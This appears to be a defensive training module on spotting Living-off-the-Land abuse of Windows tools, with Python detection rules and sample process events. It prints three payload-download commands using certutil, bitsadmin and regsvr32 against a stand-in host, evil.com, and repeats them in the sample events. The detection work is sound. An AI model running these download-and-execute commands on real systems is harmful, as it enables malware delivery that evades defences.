MODULE 15
Living off the Land (LotL)
Detecting abuse of native tools: certutil, bitsadmin, regsvr32.
LotL Techniques
Attackers use legitimate, native Windows tools to avoid detection. Command lines to look for:
certutil.exe -urlcache -f http://evil.com/malware.exe
bitsadmin /transfer job http://evil.com/file.exe C:\temp\file.exe
regsvr32 /s /u /i:http://evil.com/script.sct scrobj.dll
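One way to turn the three command lines above into detection logic over process-creation events. This is an added example, not code from the module. The Image and CommandLine field names assume Sysmon-style process-creation records, and the rule names and the sample events are constructed for illustration.

```python
import ntpath
import re

URL = r"(?:https?|ftp)://[^\s\"]+"

# (rule name, tool file name, pattern the command line must match).
# Switch prefixes are matched as "-" or "/" and case is ignored, so a rule
# does not depend on the spelling used in the module's sample commands.
RULES = [
    ("certutil_urlcache_download", "certutil.exe",
     re.compile(r"[-/]urlcache\b.*" + URL, re.I)),
    ("bitsadmin_transfer_download", "bitsadmin.exe",
     re.compile(r"[-/]transfer\b.*" + URL, re.I)),
    ("regsvr32_remote_scriptlet", "regsvr32.exe",
     re.compile(r"(?=.*[-/]i:\"?" + URL + r")(?=.*\bscrobj\b)", re.I)),
]


def detect(event):
    """Return the names of the rules matched by one process-creation event."""
    # ntpath splits on backslashes even when the analysis host is not Windows.
    image = ntpath.basename(event.get("Image", "")).lower()
    cmd = event.get("CommandLine", "")
    return [name for name, tool, pat in RULES if tool == image and pat.search(cmd)]


def scan(events):
    """Return (index, matched rules) for every event that matches a rule."""
    hits = [(i, detect(e)) for i, e in enumerate(events)]
    return [(i, rules) for i, rules in hits if rules]


# Constructed events: the module's three commands, one differently spelled
# certutil invocation, and two routine uses that must not alert.
SYS = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = [{"Image": image, "CommandLine": cmd} for image, cmd in [
    (SYS + "certutil.exe", "certutil.exe -urlcache -f http://evil.com/malware.exe"),
    (SYS + "bitsadmin.exe", r"bitsadmin /transfer job http://evil.com/file.exe C:\temp\file.exe"),
    (SYS + "regsvr32.exe", "regsvr32 /s /u /i:http://evil.com/script.sct scrobj.dll"),
    ("C:\\WINDOWS\\SYSTEM32\\CERTUTIL.EXE", "CERTUTIL.EXE /URLCACHE /F http://evil.com/malware.exe"),
    (SYS + "certutil.exe", r"certutil -hashfile C:\temp\file.exe SHA256"),
    (SYS + "regsvr32.exe", r"regsvr32 /s C:\Windows\System32\scrobj.dll"),
]]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
```

Each rule requires both the tool name and the remote-URL argument, so routine uses such as hashing a file with certutil or registering a local DLL with regsvr32 do not alert.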